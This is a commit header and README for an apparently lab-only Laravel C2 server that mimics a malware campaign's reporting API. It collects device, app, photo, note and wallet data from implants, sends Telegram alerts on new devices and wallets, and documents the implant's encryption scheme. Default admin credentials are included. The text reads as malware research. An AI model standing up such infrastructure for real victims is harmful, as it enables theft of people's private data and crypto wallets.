This commit is contained in:
hashbro
2026-08-04 05:00:42 +08:00
commit ea0be57180
304 changed files with 18921 additions and 0 deletions
+98
View File
@@ -0,0 +1,98 @@
# Coruna Lab C2 + Admin
Laravel reporting C2 API and LayuiAdmin console for local lab use.
- Implements reporting routes from the Coruna dataflow doc (§7.2)
- AES-256-ECB JSON transport + multipart `/api/user/check` 7z extract
- Persists devices / apps / photos / notes / wallets + full `c2_raw_logs`
- Telegram notify on **new device** and **new/changed wallet address** only
- **Does not** implement `/kill` or any mnemonic/private-key transfer
## Requirements
| Tool | Path / note |
|------|-------------|
| PHP 8.5+ | `/opt/homebrew/opt/php/bin/php` (do **not** use PATH’s old 7.3) |
| Composer | via brew PHP |
| MySQL 8.0 | preferred (`coruna_lab` DB) — sqlite works for smoke |
| p7zip | `/opt/homebrew/opt/p7zip/bin/7z` for photo archives |
```bash
export PATH="/opt/homebrew/opt/php/bin:$PATH"
php -v # expect 8.5.x
```
## Setup
```bash
cd coruna-lab/server
cp .env.example .env # if needed
# edit .env: DB_*, TELEGRAM_*, ADMIN_*
# MySQL 8 (DB: coruna) — set DB_* in .env then:
php artisan key:generate # once
php artisan migrate --seed
php artisan serve --host=0.0.0.0 --port=8000
```
Admin UI uses **layuiAdmin std iframe** assets from `public/static/layuiadmin/`
(synced from local `layuiAdmin.std-v1.4.0/dist/layuiadmin`).
Default admin (from seeder / `.env`):
- Shell: `http://127.0.0.1:8000/admin`
- Login: `http://127.0.0.1:8000/admin/login` — `admin` / `admin123`
## Point reporting at this lab
Implants call the campaign reporting host. For lab capture, resolve that host to this machine (DNS / `/etc/hosts` / mitm) so traffic hits `php artisan serve` (or a reverse proxy in front of `public/`).
C2 routes are unauthenticated (client-compatible). Admin is session-auth under `/admin`.
## C2 API reference
各 reporting 接口用途、请求/响应数据结构:[`docs/C2_API.md`](docs/C2_API.md)。
## Crypto
```text
session_key = map(b -> (b%94)+33, bytes.fromhex(derive_archive_password(0))) # 16 ASCII
aes_key = SHA256(session_key || timestamp) # 13-digit header
body = Base64(AES-256-ECB-PKCS7(timestamp || payload))
```
Optional `.env` override: `CORUNA_SESSION_KEY` (16 ASCII). Empty = PHP KDF (parity with Python `coruna_netconfig_pipeline.derive_archive_password(0)`).
Known vector: `SHA256(session_key) = 9bcc53d7…ef1be1e4`.
`/api/user/check`: repair Coruna 7z header, password `session_key||batchBase` (default `0`). `sig` is ignored.
## Env knobs
| Key | Purpose |
|-----|---------|
| `TELEGRAM_BOT_TOKEN` / `TELEGRAM_OWNER_CHAT_ID` | New device / wallet alerts |
| `PAYOUT_ETH` / `BTC` / `TRON` / `SOL` | Reserved only — **not wired** |
| `CORUNA_7Z_BIN` | p7zip binary |
## Tests
```bash
php artisan test
# Unit: CorunaCrypto vs Python vectors
# Feature: query / avatar/set ingest / admin login
```
## Layout
```text
app/Services/CorunaCrypto.php # KDF + AES
app/Services/CorunaArchive.php # 7z repair/extract
app/Services/IngestService.php # device/apps/photos/notes/wallets
app/Services/TelegramNotifier.php
app/Http/Middleware/DecryptCorunaBody.php
app/Http/Controllers/C2/…
app/Http/Controllers/Admin/…
public/static/layuiadmin/ # Layui UI assets
storage/app/c2/ # check extracts + photos
```